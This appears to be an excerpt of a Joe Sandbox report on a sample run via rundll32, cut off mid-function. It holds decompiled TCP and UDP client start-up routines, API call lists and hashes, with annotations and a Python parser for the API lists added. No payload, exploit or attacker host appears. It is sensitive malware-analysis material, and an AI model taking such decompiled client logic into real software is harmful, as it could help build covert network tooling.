                                                            • Instruction Fuzzy Hash: 68418471A00119EFDB10DFD9EC84AADF7B9FF44762F1102A6E908E7250EB355E108B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0466BCDF(intOrPtr _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _t25;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr _t28;
                                                            				intOrPtr* _t29;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr* _t46;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr _t74;
                                                            
                                                            				_t74 = _a4;
                                                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                            				if(_t25 != 0 && _t25 != 0x46846f0) {
                                                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                            					if(_t45 != 0 &&  *_t45 == 0) {
                                                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                            						if(_t46 != 0 &&  *_t46 == 0) {
                                                            							E046684AD(_t46);
                                                            							E0466BFF3( *((intOrPtr*)(_t74 + 0x88)));
                                                            						}
                                                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                            						if(_t47 != 0 &&  *_t47 == 0) {
                                                            							E046684AD(_t47);
                                                            							E0466C0F1( *((intOrPtr*)(_t74 + 0x88)));
                                                            						}
                                                            						E046684AD( *((intOrPtr*)(_t74 + 0x7c)));
                                                            						E046684AD( *((intOrPtr*)(_t74 + 0x88)));
                                                            					}
                                                            				}
                                                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                            				if(_t26 != 0 &&  *_t26 == 0) {
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                            					E046684AD( *((intOrPtr*)(_t74 + 0x8c)));
                                                            				}
                                                            				E0466BE52( *((intOrPtr*)(_t74 + 0x9c)));
                                                            				_t28 = 6;
                                                            				_t16 = _t74 + 0xa0; // 0xa1
                                                            				_t55 = _t16;
                                                            				_v8 = _t28;
                                                            				_t18 = _t74 + 0x28; // 0x29
                                                            				_t70 = _t18;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t70 - 8)) != 0x4684100) {
                                                            						_t31 =  *_t70;
                                                            						if(_t31 != 0 &&  *_t31 == 0) {
                                                            							E046684AD(_t31);
                                                            							E046684AD( *_t55);
                                                            						}
                                                            						_t28 = _v8;
                                                            					}
                                                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                            						if(_t29 != 0 &&  *_t29 == 0) {
                                                            							E046684AD(_t29);
                                                            						}
                                                            						_t28 = _v8;
                                                            					}
                                                            					_t55 = _t55 + 4;
                                                            					_t70 = _t70 + 0x10;
                                                            					_t28 = _t28 - 1;
                                                            					_v8 = _t28;
                                                            				} while (_t28 != 0);
                                                            				return E046684AD(_t74);
                                                            			}


                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0466BD23
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C010
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C022
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C034
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C046
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C058
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C06A
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C07C
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C08E
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0A0
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0B2
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0C4
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0D6
                                                              • Part of subcall function 0466BFF3: _free.LIBCMT ref: 0466C0E8
                                                            • _free.LIBCMT ref: 0466BD18
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 0466BD3A
                                                            • _free.LIBCMT ref: 0466BD4F
                                                            • _free.LIBCMT ref: 0466BD5A
                                                            • _free.LIBCMT ref: 0466BD7C
                                                            • _free.LIBCMT ref: 0466BD8F
                                                            • _free.LIBCMT ref: 0466BD9D
                                                            • _free.LIBCMT ref: 0466BDA8
                                                            • _free.LIBCMT ref: 0466BDE0
                                                            • _free.LIBCMT ref: 0466BDE7
                                                            • _free.LIBCMT ref: 0466BE04
                                                            • _free.LIBCMT ref: 0466BE1C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: f9eb848fe3519931447807340796eb2b680421c9b423823b6796cb224ce0ebd4
                                                            • Instruction ID: f85e9d4ed88d9c134386b83611d85a756c475ab91258cdfc56963ba0ab637078
                                                            • Opcode Fuzzy Hash: f9eb848fe3519931447807340796eb2b680421c9b423823b6796cb224ce0ebd4
                                                            • Instruction Fuzzy Hash: A2314A31600315DFEB21AA39EC44B5AB3E8EF50764F14882EE85ADF250FE31F8818B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0464ECE0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v36;
                                                            				char _v64;
                                                            				long _v68;
                                                            				intOrPtr _v72;
                                                            				signed int _t47;
                                                            				long _t60;
                                                            				long _t61;
                                                            				signed int _t69;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr* _t105;
                                                            				signed int _t109;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e: __security_cookie; _v8 is the /GS stack canary (cookie ^ ebp), checked by E04655AFE on every return
                                                            				_v8 = _t47 ^ _t109;
                                                            				_t82 = _a4;
                                                            				_t105 = __ecx;
                                                            				_v72 = _a16;
                                                            				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t109;
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x148); // acquire the spin lock at +0x148 (InterlockedCompareExchange/SwitchToThread, see APIs below)
                                                            					_t113 =  *(__ecx + 0x50) - 3;
                                                            					if( *(__ecx + 0x50) != 3) { // the state word at +0x50 must be 3 before Start(); otherwise fail with error code 1 at +0x48
                                                            						 *(__ecx + 0x48) = 1;
                                                            						SetLastError(0x139f); // 0x139f = ERROR_INVALID_STATE
                                                            						 *(_t105 + 0x148) = 0; // release the lock
                                                            						goto L16;
                                                            					} else {
                                                            						 *(__ecx + 0x50) = 0;
                                                            						 *(__ecx + 0x148) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                            						 *(__ecx + 0xc) = 1;
                                                            						_v36 = 0;
                                                            						_v64 = 0;
                                                            						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                            						 *(__ecx + 0x14) = 0;
                                                            						 *(__ecx + 0x18) = 1;
                                                            						_v68 = 0;
                                                            						_t60 = E0464EF50(_t82, __ecx, __ecx, _t113, _t82,  &_v36, _a8, _v72,  &_v64); // socket set-up helper; on failure it reports 0x273f = WSAEAFNOSUPPORT via WSASetLastError
                                                            						if(_t60 == 0) {
                                                            							__imp__#111(); // WS2_32 ordinal 111 = WSAGetLastError (matches the WSAGetLastError refs in the APIs list)
                                                            							 *(__ecx + 0x48) = 3; // error code 3 at +0x48
                                                            							goto L13;
                                                            						} else {
                                                            							_t60 = E0464DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20); // local-address bind helper (htons + bind)
                                                            							if(_t60 == 0) {
                                                            								__imp__#111(); // WSAGetLastError
                                                            								 *(__ecx + 0x48) = 4; // error code 4 at +0x48
                                                            								L13:
                                                            								SetLastError(_t60);
                                                            								goto L14;
                                                            							} else {
                                                            								SetLastError(0);
                                                            								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                            								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) { // virtual call (vtable slot +0x78) with the value at +0x1c pushed; a return value of 2 is the failure case
                                                            									_t69 = GetLastError();
                                                            									__eflags = _t69;
                                                            									_t70 = (_t69 == 0) ? 0x4c7 : _t69; // 0x4c7 = ERROR_CANCELLED when no last error is set
                                                            									L0464EBB0(_t105, 5, "CTcpClient::Start", _t70); // error code 5
                                                            									goto L14;
                                                            								} else {
                                                            									_t98 = _t105;
                                                            									if(E0464F0B0( &_v36, _t105,  &_v36, _a12) == 0) { // connect helper: WSAEventSelect(s, ev, 0x30 = FD_CONNECT|FD_CLOSE), then a non-blocking connect()
                                                            										__imp__#111(); // WSAGetLastError
                                                            										L0464EBB0(_t105, 0xb, "CTcpClient::Start", _t73); // error code 0xb: connect failed
                                                            										goto L14;
                                                            									} else {
                                                            										_t76 = E0465F897(_t98, 0, 0, E0464F190, _t105, 0, _t105 + 0x44); // argument shape of _beginthreadex(security, stack, start routine E0464F190, this, flags, &id at +0x44); the worker thread for this client
                                                            										 *((intOrPtr*)(_t105 + 0x40)) = _t76; // thread handle kept at +0x40
                                                            										if(_t76 == 0) {
                                                            											L0464EBB0(_t105, 8, "CTcpClient::Start", 0x65f); // error code 8: thread creation failed
                                                            											L14:
                                                            											 *(_t105 + 0xc) = 0;
                                                            											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                            											 *(_t105 + 0x14) = 0;
                                                            											 *(_t105 + 0x18) = 1;
                                                            											_t61 = GetLastError();
                                                            											 *((intOrPtr*)( *_t105 + 4))();
                                                            											SetLastError(_t61);
                                                            											__eflags = _v8 ^ _t109;
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										} else {
                                                            											_v68 = 1; // success path
                                                            											ResetEvent( *(_t105 + 4)); // clear the event whose handle is stored at +4
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses for the C-code above (decompiler line-to-address map, in order; 0x00000000 marks a line without its own instruction):
                                                            0x0464ece6 0x0464eced 0x0464ecf4 0x0464ecf9 0x0464ecfb 0x0464ed08 0x0464eee7 0x0464eeee
                                                            0x0464eef9 0x0464ed0e 0x0464ed14 0x0464ed19 0x0464ed1d 0x0464eed0 0x0464eed7 0x0464eedd
                                                            0x00000000 0x0464ed23 0x0464ed23 0x0464ed2c 0x0464ed38 0x0464ed40 0x0464ed47 0x0464ed4d
                                                            0x0464ed5b 0x0464ed65 0x0464ed6e 0x0464ed75 0x0464ed7c 0x0464ed89 0x0464ee75 0x0464ee7b
                                                            0x00000000 0x0464ed8f 0x0464ed9c 0x0464eda3 0x0464ee66 0x0464ee6c 0x0464ee82 0x0464ee89
                                                            0x00000000 0x0464eda9 0x0464edb1 0x0464edb7 0x0464edc0 0x0464ee49 0x0464ee4b 0x0464ee52
                                                            0x0464ee5f 0x00000000 0x0464edc6 0x0464edcc 0x0464edd6 0x0464ee32 0x0464ee42 0x00000000
                                                            0x0464edd8 0x0464ede8 0x0464edf0 0x0464edf5 0x0464ee2b 0x0464ee8b 0x0464ee8b 0x0464ee92
                                                            0x0464ee99 0x0464eea0 0x0464eea7 0x0464eeaf 0x0464eeb3 0x0464eebe 0x0464eec8 0x0464edf7
                                                            0x0464edfa 0x0464ee01 0x0464ee1a 0x0464ee1a 0x0464edf5 0x0464edd6 0x0464edc0 0x0464eda3
                                                            0x0464ed89 0x0464ed1d

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 0464EED7
                                                              • Part of subcall function 0464EF50: WSASetLastError.WS2_32(0000273F,?,?), ref: 0464EFD6
                                                            • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0464EDB1
                                                            • GetLastError.KERNEL32 ref: 0464EE49
                                                              • Part of subcall function 0464F0B0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0464F0C4
                                                              • Part of subcall function 0464F0B0: connect.WS2_32(?,?,00000010), ref: 0464F0EC
                                                              • Part of subcall function 0464F0B0: WSAGetLastError.WS2_32 ref: 0464F0FF
                                                            • ResetEvent.KERNEL32(?), ref: 0464EE01
                                                            • WSAGetLastError.WS2_32(?,00000005), ref: 0464EE32
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0464EE66
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0464EE75
                                                            • SetLastError.KERNEL32(00000000), ref: 0464EE89
                                                            • GetLastError.KERNEL32 ref: 0464EEA7
                                                            • SetLastError.KERNEL32(00000000), ref: 0464EEB3
                                                              • Part of subcall function 0464DB70: htons.WS2_32(?), ref: 0464DBDE
                                                              • Part of subcall function 0464DB70: bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                            • String ID: CTcpClient::Start
                                                            • API String ID: 4138520258-3740072585
                                                            • Opcode ID: cb28e017a907f16c916120d027ff05488690b31b2f86b2f87073255edd70d345
                                                            • Instruction ID: a88fda4ca4ccabc4289d32fb78975ebbddb060b9041c8760b723d912db7b31f4
                                                            • Opcode Fuzzy Hash: cb28e017a907f16c916120d027ff05488690b31b2f86b2f87073255edd70d345
                                                            • Instruction Fuzzy Hash: 33516370700609EFEB14DFA5D888B9EBBB9FF88305F000119E506D7291EB76B914CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
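The "APIs" list printed for a decompiled function is the part of this report a triager usually reads first: it enumerates the Win32 and Winsock imports reached from the function, directly or through the "Part of subcall function" entries, together with the address of each call site. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample. It parses lines in exactly the shape printed above into structured records, separates direct calls from those reached via subcalls, lists the WS2_32 calls that make up the connect sequence, and decodes the few Win32 and Winsock constants that occur as literal arguments here. The SAMPLE_APIS text is constructed from the entries above; the regular expression assumes the bullet glyph and "ref:" layout as printed, and the constant table and all helper names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: entries copied in the shape Joe Sandbox prints them
# under "APIs" for a decompiled function. Direct calls sit at the outer bullet
# level; calls reached through a callee carry a "Part of subcall function" prefix.
SAMPLE_APIS = """\
  • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
• SetLastError.KERNEL32(0000139F), ref: 0464EED7
  • Part of subcall function 0464EF50: WSASetLastError.WS2_32(0000273F,?,?), ref: 0464EFD6
• GetLastError.KERNEL32 ref: 0464EE49
  • Part of subcall function 0464F0B0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0464F0C4
  • Part of subcall function 0464F0B0: connect.WS2_32(?,?,00000010), ref: 0464F0EC
• ResetEvent.KERNEL32(?), ref: 0464EE01
• WSAGetLastError.WS2_32(?,00000005), ref: 0464EE32
  • Part of subcall function 0464DB70: bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
"""

# One bullet line. The argument list is optional ("GetLastError.KERNEL32 ref: ...")
# and the comma before "ref:" is only printed when arguments are present.
_API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants that appear as literal arguments in this report (values from
# winerror.h / winsock2.h). The table is the example's own, not the report's.
KNOWN_CONSTANTS: Dict[int, str] = {
    0x139F: "ERROR_INVALID_STATE",
    0x04C7: "ERROR_CANCELLED",
    0x273F: "WSAEAFNOSUPPORT",
    0x0030: "FD_CONNECT|FD_CLOSE",
}


@dataclass(frozen=True)
class ApiCall:
    name: str            # imported function, e.g. "connect"
    module: str          # exporting module as printed, e.g. "WS2_32"
    args: List[str]      # argument column as printed; "?" means unresolved
    ref: int             # address of the call instruction
    via: Optional[int]   # address of the intermediate callee, None for a direct call

    @property
    def direct(self) -> bool:
        return self.via is None


def parse_api_section(text: str) -> List[ApiCall]:
    """Parse the bullet lines of a report's "APIs" section; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=[a.strip() for a in args.split(",")] if args else [],
            ref=int(m.group("ref"), 16),
            via=int(m.group("via"), 16) if m.group("via") else None,
        ))
    return calls


def decode_constant(arg: str) -> str:
    """Render a hex argument with its symbolic name when it is a known constant."""
    if arg == "?":
        return "?"
    value = int(arg, 16)
    name = KNOWN_CONSTANTS.get(value)
    return f"{name} ({value})" if name else f"0x{value:X}"


def winsock_sequence(calls: List[ApiCall]) -> List[str]:
    """WS2_32 calls in report order: the part to read first for a network client."""
    return [c.name for c in calls if c.module == "WS2_32"]


def summarize(calls: List[ApiCall]) -> Dict[str, object]:
    """Compact view that can be diffed between sibling functions (e.g. TCP vs UDP Start)."""
    return {
        "modules": sorted({c.module for c in calls}),
        "direct": [c.name for c in calls if c.direct],
        "subcall_helpers": sorted({f"{c.via:08X}" for c in calls if c.via is not None}),
        "decoded_args": {
            f"{c.name}@{c.ref:08X}": [decode_constant(a) for a in c.args]
            for c in calls
            if any(a != "?" for a in c.args)
        },
    }


if __name__ == "__main__":
    for key, value in summarize(parse_api_section(SAMPLE_APIS)).items():
        print(f"{key}: {value}")
```

Running the script prints the summary for the constructed list; feeding it the "APIs" list of the CUdpClient::Start variant below and comparing the two summaries shows where the two clients differ (the bind and socket helpers) and where they share code (the lock, error and event handling).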

                                                            C-Code - Quality: 71%
                                                            			E0464D790(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v36;
                                                            				char _v64;
                                                            				long _v68;
                                                            				intOrPtr _v72;
                                                            				void* __ebp;
                                                            				signed int _t47;
                                                            				long _t60;
                                                            				long _t61;
                                                            				signed int _t69;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr* _t105;
                                                            				signed int _t109;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t47 ^ _t109;
                                                            				_t82 = _a4;
                                                            				_t105 = __ecx;
                                                            				_v72 = _a16;
                                                            				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                            					L16:
                                                            					__eflags = _v8 ^ _t109;
                                                            					return E04655AFE(_v8 ^ _t109);
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x148);
                                                            					_t113 =  *(__ecx + 0x50) - 3;
                                                            					if( *(__ecx + 0x50) != 3) {
                                                            						 *(__ecx + 0x48) = 1;
                                                            						SetLastError(0x139f);
                                                            						 *(_t105 + 0x148) = 0;
                                                            						goto L16;
                                                            					} else {
                                                            						 *(__ecx + 0x50) = 0;
                                                            						 *(__ecx + 0x148) = 0;
                                                            						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                            						 *(__ecx + 0xc) = 1;
                                                            						_v36 = 0;
                                                            						_v64 = 0;
                                                            						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                            						 *(__ecx + 0x14) = 0;
                                                            						 *(__ecx + 0x18) = 1;
                                                            						_v68 = 0;
                                                            						_t60 = E0464DA30(_t82, __ecx, __ecx, __esi, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                            						if(_t60 == 0) {
                                                            							__imp__#111(); // WS2_32 ordinal 111 = WSAGetLastError (same pattern as CTcpClient::Start above)
                                                            							 *(__ecx + 0x48) = 3;
                                                            							goto L13;
                                                            						} else {
                                                            							_t60 = E0464DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                            							if(_t60 == 0) {
                                                            								__imp__#111();
                                                            								 *(__ecx + 0x48) = 4;
                                                            								L13:
                                                            								SetLastError(_t60);
                                                            								goto L14;
                                                            							} else {
                                                            								SetLastError(0);
                                                            								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                            								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                            									_t69 = GetLastError();
                                                            									__eflags = _t69;
                                                            									_t70 = (_t69 == 0) ? 0x4c7 : _t69; // 0x4c7 = ERROR_CANCELLED when no last error is set
                                                            									L0464EBB0(_t105, 5, "CUdpClient::Start", _t70); // error code 5
                                                            									goto L14;
                                                            								} else {
                                                            									_push(_a12);
                                                            									_t98 = _t105;
                                                            									if(E0464DCA0( &_v36, SetLastError, _t105, _t105,  &_v36) == 0) {
                                                            										__imp__#111();
                                                            										L0464EBB0(_t105, 0xb, "CUdpClient::Start", _t73);
                                                            										goto L14;
                                                            									} else {
                                                            										_t76 = E0465F897(_t98, 0, 0,  &M0464DDE0, _t105, 0, _t105 + 0x44);
                                                            										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                            										if(_t76 == 0) {
                                                            											L0464EBB0(_t105, 8, "CUdpClient::Start", 0x65f);
                                                            											L14:
                                                            											 *(_t105 + 0xc) = 0;
                                                            											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                            											 *(_t105 + 0x14) = 0;
                                                            											 *(_t105 + 0x18) = 1;
                                                            											_t61 = GetLastError();
                                                            											 *((intOrPtr*)( *_t105 + 4))();
                                                            											SetLastError(_t61);
                                                            											__eflags = _v8 ^ _t109;
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										} else {
                                                            											_v68 = 1;
                                                            											ResetEvent( *(_t105 + 4));
                                                            											return E04655AFE(_v8 ^ _t109);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            0x0464d796
                                                            0x0464d79d
                                                            0x0464d7a4
                                                            0x0464d7a9
                                                            0x0464d7ab
                                                            0x0464d7b8
                                                            0x0464d997
                                                            0x0464d99e
                                                            0x0464d9a9
                                                            0x0464d7be
                                                            0x0464d7c4
                                                            0x0464d7c9
                                                            0x0464d7cd
                                                            0x0464d980
                                                            0x0464d987
                                                            0x0464d98d
                                                            0x00000000
                                                            0x0464d7d3
                                                            0x0464d7d3
                                                            0x0464d7dc
                                                            0x0464d7e8
                                                            0x0464d7f0
                                                            0x0464d7f7
                                                            0x0464d7fd
                                                            0x0464d80b
                                                            0x0464d815
                                                            0x0464d81e
                                                            0x0464d825
                                                            0x0464d82c
                                                            0x0464d839
                                                            0x0464d925
                                                            0x0464d92b
                                                            0x00000000
                                                            0x0464d83f
                                                            0x0464d84c
                                                            0x0464d853
                                                            0x0464d916
                                                            0x0464d91c
                                                            0x0464d932
                                                            0x0464d939
                                                            0x00000000
                                                            0x0464d859
                                                            0x0464d861
                                                            0x0464d867
                                                            0x0464d870
                                                            0x0464d8f9
                                                            0x0464d8fb
                                                            0x0464d902
                                                            0x0464d90f
                                                            0x00000000
                                                            0x0464d876
                                                            0x0464d876
                                                            0x0464d87c
                                                            0x0464d886
                                                            0x0464d8e2
                                                            0x0464d8f2
                                                            0x00000000
                                                            0x0464d888
                                                            0x0464d898
                                                            0x0464d8a0
                                                            0x0464d8a5
                                                            0x0464d8db
                                                            0x0464d93b
                                                            0x0464d93b
                                                            0x0464d942
                                                            0x0464d949
                                                            0x0464d950
                                                            0x0464d957
                                                            0x0464d95f
                                                            0x0464d963
                                                            0x0464d96e
                                                            0x0464d978
                                                            0x0464d8a7
                                                            0x0464d8aa
                                                            0x0464d8b1
                                                            0x0464d8ca
                                                            0x0464d8ca
                                                            0x0464d8a5
                                                            0x0464d886
                                                            0x0464d870
                                                            0x0464d853
                                                            0x0464d839
                                                            0x0464d7cd

                                                            APIs
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • SetLastError.KERNEL32(0000139F), ref: 0464D987
                                                              • Part of subcall function 0464DA30: WSASetLastError.WS2_32(0000273F,?,?), ref: 0464DAB6
                                                            • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0464D861
                                                            • GetLastError.KERNEL32 ref: 0464D8F9
                                                              • Part of subcall function 0464DCA0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0464DCB6
                                                              • Part of subcall function 0464DCA0: connect.WS2_32(?,?,00000010), ref: 0464DCDE
                                                              • Part of subcall function 0464DCA0: WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DCF1
                                                            • ResetEvent.KERNEL32(?), ref: 0464D8B1
                                                            • WSAGetLastError.WS2_32(?,00000005), ref: 0464D8E2
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0464D916
                                                            • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0464D925
                                                            • SetLastError.KERNEL32(00000000), ref: 0464D939
                                                            • GetLastError.KERNEL32 ref: 0464D957
                                                            • SetLastError.KERNEL32(00000000), ref: 0464D963
                                                              • Part of subcall function 0464DB70: htons.WS2_32(?), ref: 0464DBDE
                                                              • Part of subcall function 0464DB70: bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                            • String ID: CUdpClient::Start
                                                            • API String ID: 4138520258-3951387650
                                                            • Opcode ID: d256fc6f73b24e58d02940aba5ef33c89e9cd66a59b9728322932c14f2b7f3fd
                                                            • Instruction ID: 5a1dcf65ca7088c357fc1b2d093fd34c44c10fe9dca8734b51031fe1dd06b2ea
                                                            • Opcode Fuzzy Hash: d256fc6f73b24e58d02940aba5ef33c89e9cd66a59b9728322932c14f2b7f3fd
                                                            • Instruction Fuzzy Hash: 95515570B00609EFEB14EFA5D888BAEB7B9FF88304F000119E506D7691EB75B915CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0463D980(void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				short _v540;
                                                            				_Unknown_base(*)()* _v544;
                                                            				char _v548;
                                                            				signed int* _v552;
                                                            				long _v556;
                                                            				long _v560;
                                                            				intOrPtr _v576;
                                                            				_Unknown_base(*)() _v592;
                                                            				intOrPtr _v596;
                                                            				long _v600;
                                                            				long _v604;
                                                            				signed int _t44;
                                                            				struct HINSTANCE__* _t46;
                                                            				_Unknown_base(*)()* _t49;
                                                            				void* _t50;
                                                            				signed int* _t51;
                                                            				signed int* _t55;
                                                            				int _t67;
                                                            				signed int _t75;
                                                            				_Unknown_base(*)()* _t85;
                                                            				intOrPtr _t86;
                                                            				long _t87;
                                                            				intOrPtr _t91;
                                                            				long _t93;
                                                            				void* _t96;
                                                            				signed int* _t100;
                                                            				void* _t101;
                                                            				signed int _t106;
                                                            				void* _t109;
                                                            				signed int _t112;
                                                            				void* _t113;
                                                            				void* _t116;
                                                            				void* _t120;
                                                            
                                                            				_t112 = (_t109 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t109 + 4));
                                                            				_t106 = _t112;
                                                            				_t113 = _t112 - 0x258;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
